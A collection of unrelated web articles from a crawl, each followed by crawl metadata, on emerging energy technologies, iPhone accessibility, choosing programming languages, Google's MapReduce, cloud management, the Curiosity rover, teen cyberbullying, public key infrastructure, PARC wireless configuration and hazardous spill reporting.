“There’s 25,000 square miles of road surfaces, parking lots and driveways in the lower 48 states. If we covered that with solar panels with just 15 percent efficiency, we’d produce three times more electricity than this country uses on an annual basis, and it’s almost enough to power the entire world,” said Scott Brusaw, co-founder of Solar Roadways, in a segment of Your Environmental Road Trip, a new film that explores cutting-edge energy solutions.
Though many think driving on glass wouldn’t work, materials scientists beg to differ. Window glass is only one of countless forms glass can take. If specially manufactured, its strength can be that of steel and ideal for driving on.
“In dry conditions … there would be few surfaces better for a roadway than glass,” wrote the Pacific Northwest National Laboratory’s Joseph Ryan, a specialist in materials science, in a paper titled Energy Solutions from Glass Road Surfaces. This changes when water is introduced; however, that problem could be mitigated. “Molten glass can easily be molded into shapes specifically designed to maximize the run-off of water and maximize tire-roadway contact in wet conditions,” he said.
Solar Roadways has built a 12-foot-by-12-foot prototype. Not only does the panel generate energy, it also lights up, creating a safer nighttime driving experience.
It’s innovative solutions like Solar Roadways that many hope will serve as the foundation of our energy future. There won’t be a handful of energy sources — coal, oil, nuclear — like we have today. Rather, an entire ecosystem of energy technologies will work together to power our world.
As admirable as it is, it’s likely that Brusaw’s vision of the entire road grid covered in his panels won’t come to fruition. But even if some roads aren’t transformed by Solar Roadways, there are plenty of other ways to harvest energy from them.
Enter piezoelectricity. Piezoelectricity is the charge that’s generated by applying mechanical strain to materials. There are many devices we use every day that create piezoelectricity. Cigarette lighters and gas grills, for example, employ a small hammer that strikes a piezoelectric crystal — usually quartz — that creates sufficient current to spark a gas flame. Many other materials, such as cane sugar, topaz, bone, wood and certain ceramics exhibit piezoelectric properties. This fundamental electromechanical principle is being used by some companies that hope to transform our everyday movements into energy.
“There are several types of technologies in energy harvesting which converts kinetic movement into electricity,” said Farouk Balouchi, a technology analyst at IDTechEx, a research and analysis firm specializing in energy harvesting. “Kinetic energy can be transformed from movement into usable electricity for signage, low-power lighting, sensor systems and that type of thing.”
To do this, some companies are building piezoelectric energy devices that can be deployed in homes and offices. Germany-based EnOcean creates energy harvesters that generate a small amount of electricity when they sense motion, pressure, light, temperature change, rotation or vibration. For example, if these devices were installed in floors and on steps, every time people moved, electricity would be created and used to help power the facility. The electricity generated would supplant the energy that would normally come from the grid, allowing a home or office to power itself while helping to create a more efficient energy environment.
“[These] devices are being scaled down and made very small, and they allow a small movement or vibration to be used to power the electronics, which have become very small and only require micro watts of power,” Balouchi said. “It would be part of the kind of ecosystem of our living planet. The ‘Internet of Things’ comes to mind, where you have sensor in every part of your living environment in the buildings and in the floors in every part of your life.
“You can envision these systems powering themselves and being put into a building’s structure, so a truck driving by or a vibration on the actual wall of the building causes these devices to charge themselves,” Balouchi added.
Innowattech, based in Ra’anana, Israel, develops piezoelectric devices that are installed in roads and railways. The devices transform the kinetic energy of vehicles and trains into electricity, which is used to power lights, traffic signals, railroad crossings and red-light cameras along the road. Any excess electricity that’s generated is delivered into the grid for other uses.
In 2009, the Israeli government sponsored an experiment in which Innowattech installed its devices in a 10-yard stretch of highway. Each hour the small section of roadway generated 2,000 watt-hours of electricity. Innowattech calculated that if the devices were installed in a single lane one kilometer long, 200 kilowatt-hours of electricity could be produced — enough to power 200 to 300 homes.
“The energy is quite significant,” Balouchi said. “You’re talking about kilowatts of power and that could actually be put back into the grid system and used productively.”
Not all the energy solutions of tomorrow exist on the open road. Many promising technologies simply make existing energy generation better. At the 2011 Consumer Electronics Show in Las Vegas, Panasonic showed off its household fuel cell cogeneration system. The home fuel cell creates a chemical reaction using oxygen in the air and hydrogen, which in this case is extracted from a home gas connection. The reaction creates electricity and heat. The electricity helps power the home, while the heat is used to heat water and the home itself.
The household fuel cell has been available in Japan since 2009. There, the system has shown it can generate up to one-third of the energy used by an average Japanese household of four.
“You are literally generating on the site of your own home, your own electricity just as if it was a windmill generator or anything else,” said Peter Fannon, who manages Panasonic’s Corporate Environmental, Government & Public Affairs and Product Safety & Regulatory Compliance groups. “The goal is to reach a zero carbon dioxide emissions household, which we hope is doable within the next eight to 10 years.”
The systems aren’t cheap — Fannon said they retail at around $30,000. But like current home solar installations, he expects a combination of incentives and government programs to cut the price in half for homeowners.
As technology matures, the home fuel cell and other technologies like piezoelectric generation will help to address a fundamental problem with the electrical grid. Long-distance electricity transmission leads to line loss — the steady loss of electricity over distance. As more technologies develop that allow home and business owners to generate electricity on site, the line-loss problem starts to go away, making for a much more efficient energy environment.
“It’s 20 to 26 percent line loss in long distance, which is really painful,” Fannon said. “It’s because the lines are old and it’s [because of] the distance.”
Whether it’s a home fuel cell, a solar-powered road or a floor panel that creates electricity when you step on it, the future of energy is shaping up to be a diverse ecosystem of solutions that many hope will one day lead to true energy independence. | <urn:uuid:60a8f86d-96ee-4b8f-94df-c0d668248501> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Energy-Ecosystem-of-the-Future.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00477-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942919 | 1,696 | 3.40625 | 3 |
The iPhone is the must-have technology of the moment—unless you are unable to use it. A user must be able:
- To see fairly well, not 20-20 vision but something close. If the user is blind they cannot see the controls on the screen and therefore cannot control the device. If the user has a vision impairment the controls may not be sufficiently clear and again the device is of no use.
- Hold the device steady with one hand whilst controlling it with the fingertips of the other. Whilst ruling out its use by a tetraplegic user it also appears to rule out ladies with long nails (the nails get in the way of the fingertips and trying to control the device with the pads of fingers or nails does not seem to work well if at all).
If you search for 'iphone accessibility' on the apple site you will find a list of standard features that can make the iPhone more accessible. It is a useful list but leaves a significant number of holes.
It might be argued that the iPhone is a very visual device so a blind user would not want to use it. This is wrong because there are a large number of features that will appeal to blind users that are not available on other devices. These include the excellent integration with diary and address book on the the Mac, integration of the iPod function into the phone, functions relating to GPS (a friend of mine puts a to-do on his iPhone to shop at a particular supermarket and when he is in the vicinity it automatically reminds him).
So the question becomes how could the iPhone be made more accessible without a complete redesign?
My suggested answers are based around the other input and output facilities of the iPhone: sound input, sound output, the movement sensor and the vibrator, as well as suggestions for alternative pointing devices and grips.
The iPhone uses a capacitive touchscreen which recognises the capacitance of a bare fingertip, it does not recognise a fingernail or a plastic stylus because they do not conduct electricity well. It is possible to design stylus pointer devices that do have a capacitance and would be recognised. The simplest would be a metal stylus held in the hand but some general purpose device that works independently of bare fingers might be more useful. This device could be used with a prosthetic hand, at the end of a pointer held in the mouth or a variety of other similar devices. It could also prove useful to the apparently able-bodied users who cannot use bare fingertips, including the lady with long nails but also workers in cold or dangerous situations that have to wear gloves. In fact there are third parties who sell such devices but they are not mentioned in the Apple documentation.
The typical way to use the iPhone is to hold it in one hand and control it with the fingers of the other. Some people do not have two hands and others need to use one hand for something else so a variety of stands, straps, clips and grips should be available. Again these are available from third parties but not marketed as accessibility aids.
The iPhone has superb sound quality which could be used for a screen reader but at present is not. Such a function would make the iPhone accessible to a large number of people with vision impairments. People who can see well enough to identify the buttons on the screen, but not well enough to read the text, would benefit from a screen reader that read out the area being pointed at and then activated it if pressed again. The Mac operating system, OS X Leopard, has the VoiceOver technology so Apple have the basis for developing a iPhone VoiceOver.
If the user cannot see the screen at all then VoiceOver will not be sufficient and they will need another method to control the device. Voice recognition is the most obvious possibility, again Mac already has Speech Command so building them into the iPhone should not be difficult.
Another possible input that is unique to the iPhone is the motion sensor. Any motion of the device can be detected; the standard phone will pick a landscape or portrait presentation depending on how the device is being held. There are games that use this to control an on-screen car. My thought is that it could be used to move the focus—for example tilt up, down, left and right could be the equivalent of cursor keys, whilst rotate right and back would be the equivalent of enter.
The vibrate feature can obviously be used for warnings as it is at the moment. It could also be used to give information, for example in conjunction with GPS and the motion sensor the user could rotate the device until it strongly vibrates then walk in that direction.
Whenever I look at devices or features designed to help people with disabilities my next thought is how could this also help a larger population. The obvious population in this case is car drivers where hand and eye free control is becoming a must and voice output of SMS is becoming the norm.
It would seem to me that:
- Apple should do more to provide basic accessibility for the iPhone.
- Specialists in specific disabilities should provide further functionality via the Apple App Store.
- Information about all the accessibility features from Apple and third parties should be available in one place.
If you have devleoped an app or add on device that could make the iPhone more accessible, or even if you just have an idea for one, please add your comments to this article. | <urn:uuid:e6266a10-38f6-4262-884e-29fe5c09476b> | CC-MAIN-2017-04 | http://www.bloorresearch.com/analysis/why-not-make-the-iphone-more-accessible/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00165-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956366 | 1,091 | 2.703125 | 3 |
Earlier in my career I was a C programmer. Not a C++ programmer, a C programmer. The reason I didn’t program in C++ is because it didn’t exist yet. I thought that C, and then C++ when it entered the scene, were incredibly strong and versatile programming languages. Having previously programmed in various other languages, I thought it was interesting that I could increment a counter by putting two plus signs before or after it. For those not in the programming world, “x = x + 1” and x++ are equivalent statements.
I remember asking the person who was teaching me how to program in C why this new syntax existed. He told me four things:
1. It provides greater flexibility when forming computations because you can refer to and increment the value of “x” in the same statement 2. If you place the “++” after the “x” it increments after its use and if you place the “++” before the “x’ it increments before its use 3. This syntax assists the compiler in creating efficient assembly language code (compilers were not as advanced at that time) 4. It looked really cool and people using other programming languages wouldn’t know what it meant.
I then asked him if the “x = x + 1” format would still work. He told me that yes, it would, but never use it in C programs because the other C programmers will make fun of you. Real C programmers only use the “x++” format.
When asking people why they like one programming language over another, one of the following themes, best described in memorable TV commercials and great classic songs, comes to mind:
• Less Filling, Taste Great: This theme illustrates that sometimes more than one programming language can appropriately do the job, it just comes down to a decision between two great options. (Ok, yes, I’m thinking about Java versus .NET). • Love the one you’re with: This is the case that sometimes the language you know always seems to be better than the language you don’t know. • Try it you’ll like it: This is often the theme brought forward by technical evangelists, rightly so, trying to get you to learn a new emerging technology. Remember, there was a time when C++, Java, .NET, PHP, and even COBOL were brand new languages. • I heard it through the grapevine: This is when a new language, or other technology, gets incredible hype within the industry and everyone starts (or wants to) hop on the bandwagon. • My dog is better than your dog: This is the case when people get entrenched in a specific technology and feel like it is the solution to all problems. Another way to state this phenomenon is that when you have a hammer, everything looks like a nail.
My reason for telling you this story, other than the fact that I always smile when I think of it, is because it takes an increadible amount of time, effort, and commitment to truly become expert in a specific programming language. As a result, you should think carefully before selecting a language to be sure it's the right language for your marketability, interest, and long term career.
Consider the following questions in making the decision to learn a new programming language.
• How marketable is this language in my geographic location? For example, if you work in Boston, how many local companies hire people with knowledge of this language? • Is this language used within the industry in which I would like to work? For example, if you want to work in the video game industry, you should learn the languages most often used in the creation of software for video games. • To use this language effectively, what other technologies will I have to learn? For example, if you are considering learning .NET, then you may also want to learn how to use SourceSafe and SQL Server. • How large is the job market for people knowing this language? Alternatively stated, is this language generally used in all industries and for many purposes, or is it a nitch language only used for specific purposes? • How much competition is there for jobs using this technology? That is to say, are there more people than jobs or more jobs than people. As an aside, if there are more jobs than people, the average pay of everyone knowing that language will generally go up because the demand for this skill set is larger than the supply of people who have it. • What is the language's future? Is it growing or shrinking in popularity? That is to say, in two years and/or five years will there be more jobs or less jobs available for people who know this technology.
I chose a programming language as my example, but I could have used any technology or any IT related job. There are a lot of great technologies out there, programming languages, analytical tools, software packages, hardware devices, and software tools. As technologists, whether you are a programmer, a help desk professional, a software tester, or any other hands-on techie, carefully choose the technologies you learn and the technologies you decide not to learn. These decisions, whether through good luck or bad, deep analysis or wild guess, will help frame your professional future. Be careful and choose wisely.
If you have any questions about your career in IT, please email me at eric@ManagerMechanics.com or find me on Twitter at @EricPBloom.
Until next time, work hard, work smart, and continue to grow.
Read more of Eric Bloom's Your IT Career blog and follow the latest IT news at ITworld. Follow Eric on Twitter at @EricPBloom. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:b33569fc-6164-4422-9511-b8ec39d5a0b2> | CC-MAIN-2017-04 | http://www.itworld.com/article/2713362/careers/selecting-the-best-programming-language--a-k-a-less-filling--taste-great-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950089 | 1,209 | 2.859375 | 3 |
How Google Works: Reducing ComplexityBy David F. Carr | Posted 2006-07-06 Email Print
For all the razzle-dazzle surrounding Google, the company must still work through common business problems such as reporting revenue and tracking projects. But it sometimes addresses those needs in unconventional—yet highly efficient—ways. Other
Google's distributed storage architecture for data is combined with distributed execution of the software that parses and analyzes it.
To keep software developers from spending too much time on the arcana of distributed programming, Google invented MapReduce as a way of simplifying the process. According to a 2004 Google Labs paper, without MapReduce the company found "the issues of how to parallelize the computation, distribute the data and handle failures" tended to obscure the simplest computation "with large amounts of complex code."
Much as the GFS offers an interface for storage across multiple servers, MapReduce takes programming instructions and assigns them to be executed in parallel on many computers. It breaks calculations into two parts—a first stage, which produces a set of intermediate results, and a second, which computes a final answer. The concept comes from functional programming languages such as Lisp (Google's version is implemented in C++, with interfaces to Java and Python).
A typical first-week training assignment for a new programmer hired by Google is to write a software routine that uses MapReduce to count all occurrences of words in a set of Web documents. In that case, the "map" would involve tallying all occurrences of each word on each page—not bothering to add them at this stage, just ticking off records for each one like hash marks on a sheet of scratch paper. The programmer would then write a reduce function to do the math—in this case, taking the scratch paper data, the intermediate results, and producing a count for the number of times each word occurs on each page.
One example, from a Google developer presentation, shows how the phrase "to be or not to be" would move through this process.
While this might seem trivial, it's the kind of calculation Google performs ad infinitum. More important, the general technique can be applied to many statistical analysis problems. In principle, it could be applied to other data mining problems that might exist within your company, such as searching for recurring categories of complaints in warranty claims against your products.
But it's particularly key for Google, which invests heavily in a statistical style of computing, not just for search but for solving other problems like automatic translation between human languages such as English and Arabic (using common patterns drawn from existing translations of words and phrases to divine the rules for producing new translations).
MapReduce includes its own middleware—server software that automatically breaks computing jobs apart and puts them back together. This is similar to the way a Java programmer relies on the Java Virtual Machine to handle memory management, in contrast with languages like C++ that make the programmer responsible for manually allocating and releasing computer memory. In the case of MapReduce, the programmer is freed from defining how a computation will be divided among the servers in a Google cluster.
Typically, programs incorporating MapReduce load large quantities of data, which are then broken up into pieces of 16 to 64 megabytes. The MapReduce run-time system creates duplicate copies of each map or reduce function, picks idle worker machines to perform them and tracks the results.
Worker machines load their assigned piece of input data, process it into a structure of key-value pairs, and notify the master when the mapped data is ready to be sorted and passed to a reduce function. In this way, the map and reduce functions alternate chewing through the data until all of it has been processed. An answer is then returned to the client application.
If something goes wrong along the way, and a worker fails to return the results of its map or reduce calculation, the master reassigns it to another computer.
As of October, Google was running about 3,000 computing jobs per day through MapReduce, representing thousands of machine-days, according to a presentation by Dean. Among other things, these batch routines analyze the latest Web pages and update Google's indexes.
Also in this Feature: | <urn:uuid:077a4494-c93c-4f7f-8256-ab0b7172f015> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Infrastructure/How-Google-Works-1/5 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281419.3/warc/CC-MAIN-20170116095121-00009-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929698 | 867 | 3.015625 | 3 |
The cloud is revolutionizing networking, and this overhaul presents enormous challenges for IT managers who are used to being able to see, monitor and control their networks and systems.
Network and systems management software has been heading in this general direction for years and is better positioned than you might think to take this next step - but there are several areas that require more work by the industry.
IN DEPTH: Guide to cloud management software
To understand the size of the problem, let’s take a look at what cloud computing is. There are many definitions, but at its heart, cloud computing is an abstraction of things that have not been abstracted before. Instead of having servers, software, applications and storage dedicated to certain tasks, all of that is abstracted to the user and even the IT manager.
Instead of being concerned about individual servers, the focus is on the services they provide – services like email or a sales application. Under the covers, resources (like servers, network devices, storage and operating systems) are shared for these services. Automation software can set up and tear down resources as needed – provisioning a virtual machine with an operating system and an application, for instance, and then tearing it down later. But the person using the service is unaware of the resources being used underneath, and they can be changing all the time.
This story, "Cloud computing presents new challenges for management software" was originally published by Network World. | <urn:uuid:a0adc393-c679-4f3c-80c7-f27f2992ecf5> | CC-MAIN-2017-04 | http://www.itworld.com/article/2739682/data-center/cloud-computing-presents-new-challenges-for-management-software.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957713 | 293 | 2.515625 | 3 |
A lot of attention is being paid to the NASA Curiosity rover's landing on the early morning of Sunday, Aug. 6 (at about 1:30 a.m. Eastern), especially with the "7 Minutes of Terror" landing cycle.
But should the landing be successful, then what? What is Curiosity going to be doing then? To help out, NASA has posted this video, introducing us to SAM, the Sample Analysis at Mars lab, and what it plans to do once it's on the surface of the Red Planet.
Bonus video: NASA's Jet Propulsion Laboratory also posted this video on "What's up for August" if you're looking for some other space-related activities for the month.
Keith Shaw rounds up the best in geek video in his ITworld.tv blog. Follow Keith on Twitter at @shawkeith. For the latest IT news, analysis and how-tos, follow ITworld on Twitter, Facebook, and Google+.
Now watch: Star Wars/Gotye parody video proves how unhip I am 32-year-old talks to 12-year-old self via VHS Meet the YouTube Complaints Department Watch a water balloon pop in space Did this 1985 film coin the phrase 'information superhighway' and predict Siri? | <urn:uuid:2ad00e25-89bb-4c54-95e3-5e920eee17f4> | CC-MAIN-2017-04 | http://www.itworld.com/article/2724600/consumer-tech-science/what-happens-after-the-mars-curiosity-lands-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00431-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.902299 | 261 | 2.578125 | 3 |
Conflict is something people tend to shy away from. Conflict, at its worst, is all about confrontation, disagreement, winners, and losers. Indeed, when people think of conflict, images of shouting matches and stressful confrontations may come to mind. Resolving conflict is not about winning or losing, but about finding the best way to advance the team toward its goals. By ensuring teams avoid the debilitating effects of negative conflict they will stay out of a trap that can sap their effectiveness and productivity.
Though, when conflict is managed properly, it can be a positive thing. A good example of conflict management is the Forming, Storming, Norming and Performing group development model. Teams and workgroups made up of IT professionals are, almost by definition, going to include smart people with strongly held opinions. That there will be disagreements is not necessarily bad. It comes down to how those opinions are communicated and perceived. | <urn:uuid:74193ae5-0d23-47b5-b652-0523cd3920cc> | CC-MAIN-2017-04 | https://www.infotech.com/research/neutralize-conflict-before-it-takes-hold | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00368-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967736 | 185 | 2.625 | 3 |
From the outside, LionReach may look like a typical 53-foot trailer, but the inside isn’t a standard training vehicle: It features state-of-the-art technology for training hospital staff and other emergency preparedness personnel. The Penn State Milton S. Hershey Medical Center purchased LionReach with a $1.5 million grant from the U.S. Department of Health and Human Services. As part of the grant, the vehicle was outfitted with tech-savvy training tools.
“The idea was to have a vehicle that we could take from place to place, that we could use to train people on multiple things,” said Nancy Flint, the LionReach program coordinator.
The trailer features Laerdal mannequins in adult, pediatric and newborn sizes to facilitate medical training. “These things are so sophisticated that they breathe, talk, sweat — we can get fluids to come out of just about any portion of them — and they can be programmed,” Flint said. The mannequins can be remotely controlled by an instructor and provide a safe environment for people to practice without training on real patients.
Photo: A woman trains on a Laerdal mannequin. Courtesy of the Penn State College of Medicine.
LionReach also has advanced airway heads that let trainees identify alternate ways of airway management on adult- and pediatric-sized mannequins.
Three computer-based preparedness simulations were developed with the grant: pandemic flu, blast mass casualty and large-scale hospital evacuation. The computers are linked through an Ethernet wireless network, which allows for complex decision-making scenarios. “Everybody’s mutual decisions kind of cascade down and may affect each other,” Flint said. “So we’re able to teach some of the hospitals to understand that their decisions are sometimes not right or wrong, but there are trade-offs.”
Video and audio of the training seminars can be recorded for detailed debriefings with the trainees: Instructors can show students how they reacted to a situation and provide additional insight. “If you want to go back and debrief with your students, you can ask, ‘Why did you do this?’ And they say, 'Wow, I didn’t know I did that,’” she said.
The vehicle also is outfitted to teach about communication technology, such as 800 MHz radios and switching talkgroups. Flint said Pennsylvania put radios in LionReach so the state can use the vehicle to train rescue personnel to use the equipment. The trailer also has satellites, webcams and video-conferencing equipment.
The medical center is looking at developing agreements with government agencies to use LionReach as an incident command center during an emergency. “If there’s something bad that happens, they [could] give us a call, then we can take this vehicle out and set it up,” Flint said.
Photo: LionReach features state-of-the-art technology for training hospital staff and other emergency preparedness personnel. Courtesy of the Penn State College of Medicine.
LionReach was exhibited at a Pennsylvania Emergency Management Agency conference, and Flint said it was interesting to hear ideas that different groups had about how they could use the trailer. “That’s the beauty of it; they know what needs they have, and the vehicle is flexible enough that we can come in and fill those gaps for them,” she said.
Although the vehicle isn’t licensed for patient care, it helped the university medical center manage patients during the H1N1 outbreak. Flint said after the governor declared H1N1 a pandemic, LionReach was deployed to aid triaging. It was staged outside of the emergency department, and staff registered patients and determined if they needed to be treated in the emergency room. | <urn:uuid:9f0b2c7d-fd6f-4dc6-aa91-7051b9bed2da> | CC-MAIN-2017-04 | http://www.govtech.com/em/training/Penn-State-LionReach-Training-Vehicle.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00028-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960538 | 811 | 2.609375 | 3 |
The first step in helping your teen deal with cyberharrassment is for you to be aware there is a problem. The recent article “What Parents Can Do to Help Teen Victims of Cyber Bullying” provides great tips on how to help your teen open up, and work together to end the harassment:
Have the ‘Cyber Bullying’ Conversation: Children don’t like to talk about bullying, but according to Roberts, “the reason for this is they have likely bullied themselves, been bullied or been a bullying bystander and the talk brings up these memories and feelings of shame.” Parents need to have an open conversation and respond without judgment as their children open up about what they know.
Explain How What You Don’t Know Does Hurt You: Some kids minimize or justify cyber bullying by saying that the target didn’t even know what was said. Roberts suggests explaining to your kids that it still hurts. “Use their life experiences to illustrate how badly they feel when people talk about them negatively,” she says.
Set Cyber Safety Rules: Whenever your children interact online, remind them that they never really know who is on the other end of cyber communication. With that in mind, Roberts recommends enforcing the guideline of “don’t do or say anything online that you wouldn’t do or say in person.”
Monitor Online Use: Know what your children are doing online to help them prevent cyber bullying and cope with it. Limit time spent on technology to naturally minimize access to and involvement with cyber bullying, suggests Roberts. | <urn:uuid:d3b0578c-b305-4960-82c7-aa94698886f8> | CC-MAIN-2017-04 | https://interwork.com/parents-can-help-teen-victims-cyber-bullying/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00514-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954885 | 327 | 3.21875 | 3 |
Public Key Infrastructure could revolutionise the way companies do business online - if only anyone would use it, says Danny Bradbury
Public Key Infrastructure (PKI) is a security mechanism for guaranteeing that on-line communications are authentic and private. It is gaining recognition as a means of implementing secure e-commerce, thereby combating one of the major concerns about doing business online.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
Where does it come from?
Although PKI has retained a high profile in recent times, its history extends back over 30 years. It was originally invented at GCHQ, the government's top-secret communications centre in the late 1960s. The US took it further and demonstrated PKI in the mid-1970s. Since then, various commercial organisations have adopted the technology and implemented it for profit.
How does it work?
PKI has two main goals: first to guarantee that the information someone is sending you is private and can't be read by anyone else; and second to ensure that the person sending you data across the Internet is who they say they are. The way it works is based on the exchange of software keys between individuals. Someone taking part in a PKI system has two keys, one of which is private and the other of which is public. If you have someone's public key, you can use it to encrypt a message that can only be deciphered by applying their private key.
That takes care of the first goal. The second goal - authentication - is solved by using digital certificates, which are issued by a trusted third party known as a certificate authority. A certificate is encrypted using a person's private key and usually contains the person's public key. You read the certificate to find the public key and then use it to decrypt the message. If you trust the authority that issued the certificate, then you can be sure that the person sending you the message is who they say they are.
Why is it important?
PKI is particularly significant in an e-commerce context because people are worried about the security of online trades and the privacy of information such as credit card details. It is particularly significant in a business-to-business (B2B) context because transactions in this space are often of a higher value than consumer purchases. Companies are starting to examine PKI as a means of non-repudiation - that is, proof that a transaction was made by a specific party.
Who is doing it?
Various banks and financial institutions are starting to climb on to the PKI bandwagon, propelled by organisations such as Identrus. There are a few certificate authorities attempting to promote PKI across the board. These companies include VeriSign (www.verisign.com) and IBM.
What are the challenges?
The key issue here is to promote PKI among the end-user community. Even now, with online trading having been around for a good few years, the banks and financial institutions are only just starting to get to grips with PKI. Your average consumer probably won't even have heard of it, in spite of links to certificate authorities built into desktop Windows applications such as Microsoft Outlook.
Certainly, vendors and governments alike are trying to promote PKI as a secure way to do business. The Electronic Communications Act, passed by the UK government in May last year, finally made electronic signatures legally admissible and defined key generation and management as a contributory service to the generation of a digital signature. Microsoft has also gone to great ends to integrate PKI capabilities into Windows 2000 at the server level.
But the end-user community is notoriously slow on the uptake with regards to new technologies and it has proven difficult to integrate support for PKI into applications, especially when they are bespoke developments.
Will we see enhancements?
One thing that could help promote PKI to consumers is its integration with smart cards - many of which could be manufactured in key chain form. Rainbow Technologies produces a hardware key - the iKey - with the ability to include PKI directly into the hardware. Nevertheless, this doesn't seem to have captured the attention of the consumer market yet.
Come together: Identrus
Identrus is a consortium of financial institutions that have come together to create a system for universally-accepted digital certificates. End-user customers using digital certificates issued by Identrus-compliant financial institutions are able to trade with each other securely. Some banks have already started rolling out Identrus-compliant applications for B2B trading, although most members are still in the development stage. | <urn:uuid:39cb0a4f-8649-4d2d-b6f7-0e889a5d1b98> | CC-MAIN-2017-04 | http://www.computerweekly.com/feature/Why-PKI | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00148-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968073 | 941 | 3.125 | 3 |
There’s no doubting the convenience of wireless networks. Their flexibility and ease has made them both the joy and the bane of network administrators. But those very same administrators may have a new tool for configuring and securing their wireless efforts, if research from the Palo Alto Research Center (PARC) finds its way into commercial products.
The computer science group at PARC has developed technology it hopes will allow network administrators to quickly deploy wireless systems without compromising security. The research resulted from PARC’s decision to use digital certificates for communication between wireless devices inside the lab. While highly secure, the devices would often take hours to get up and running. So researchers developed "gesture-directed automatic configuration." The technique permits two devices?say a laptop and a wireless access point?to identify each other and automatically configure a secure channel in less than a minute.
The technology uses a secondary channel, such as infrared, for initial communication between the devices. Using this channel, the systems exchange configuration information?including certificates?automatically. "You can only do that if you have physical access to the access point, as infrared has a very limited range," says Glenn Durfee, a security researcher in the computer science lab at PARC. And infrared isn’t the only option. PARC is working on other solutions, from audio signals to USB tokens, that would work as well. For enterprises, users could bring unconfigured devices to an "enrollment station" (such as a specially configured access point or PC) in a secure location where the process could quickly take place.
PARC is currently seeking partners for licensing the technology, though it could not provide any details about when commercial products might become available. You can find more information by visiting www.parc.com and searching for "network in a box." (For a more complete description of the instant-network process, see "Instant Networking," www.cio.com/printlinks.) | <urn:uuid:3ecad695-6413-4442-b12f-3384958fceb6> | CC-MAIN-2017-04 | http://www.cio.com/article/2439630/wifi/new-tools-for-instant-wireless-networks.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937112 | 402 | 2.71875 | 3 |
[an error occurred while processing this directive]
Dealing with Hazmat Issues:
Hazardous material spills can take a hefty toll on all involved parties. Cleanup bills, legal liabilities and frustration for affected property owners only scratch the surface of problems commonly associated with spills. With the potential for facility downtime and personnel injury, it is in the industries’ best interest to be involved in and oversee the cleanup of these incidents.
By understanding our responsibilities regarding the release of hazardous materials and knowing how to react when an incident occurs, we can minimize the required cleanup effort and the subsequent cost associated with the incident. While it is impossible to eliminate spills altogether, instances can be minimized and cleanups can be simplified if the right steps are taken. What follows are the mandated reactionary steps to be taken in the event of a hazardous substance release.
The responsibility and liability for these efforts lie with the owner of the hazardous material and/or the entity responsible for the release. While insurance providers may also be involved in the loss, they are not directly responsible or accountable for the cleanup of the spill.
What Are We Dealing With?
Hazardous substances or materials are specifically defined under many environmental statutes by the federal government. But most chemical substances that may pose a health risk to life when exposed are deemed hazardous substances.
When a hazardous substance is released to the environment, or poses a substantial threat to the environment, a release has occurred. The Environment includes surface water, groundwater, drinking water supply, land surface, subsurface strata, ambient air, dry gullies and storm sewers that discharge to surface waters.
If the release is equal to or exceeds the reportable quantity for that substance as set forth under the Code of Federal Regulations, the release must be properly reported (see Spill Reporting). In many states, petroleum products are regulated with a reportable quantity, typically established at 25 gallons or a quantity sufficient to place a “sheen” on water. Asbestos-containing materials are regulated if material containing greater than 1% asbestos is disturbed (in some states, it is regulated if it contains greater than 0.1%). The responsible party is the owner of the hazardous substance that has been released, and may include the person responsible for the spill. This title cannot be transferred to another entity, nor can it be eliminated, ever.
Releases of hazardous substances can happen in either fixed facilities or during transports. Most spills are released to soil and “soak in” before reaching surface water or are released within the confines of a facility. More than half of all spills are fuel spills resulting from ruptured fuel tanks during truck wrecks. These situations are relatively simple to cleanup.
Hazardous substances that are released to surface waters, sewer systems, drinking water supplies, or that impact groundwater require specialized equipment and expertise. Cleanup efforts for such instances can be quite costly and may be subject to penalties under the Clean Water Act. These penalties can cost as much as $25,000 per day of violation.
When a release occurs, there are a number of reporting and notification requirements that must be followed by the responsible party. These requirements tend to be confusing, and often overlap. Parties should consider their situation and make the following phone call(s):
All Hazardous Substance Releases
Fuel Storage Tank Releases
In many situations, if a reportable quantity has been released, several of these entities must be redundantly contacted. These reports typically require written follow-up within 24 hours. This action initiates a process that alerts potential receptors and the surrounding population, and may initiate regulatory response efforts. This reporting also initiates a process that will ultimately trace the cleanup to final closure.
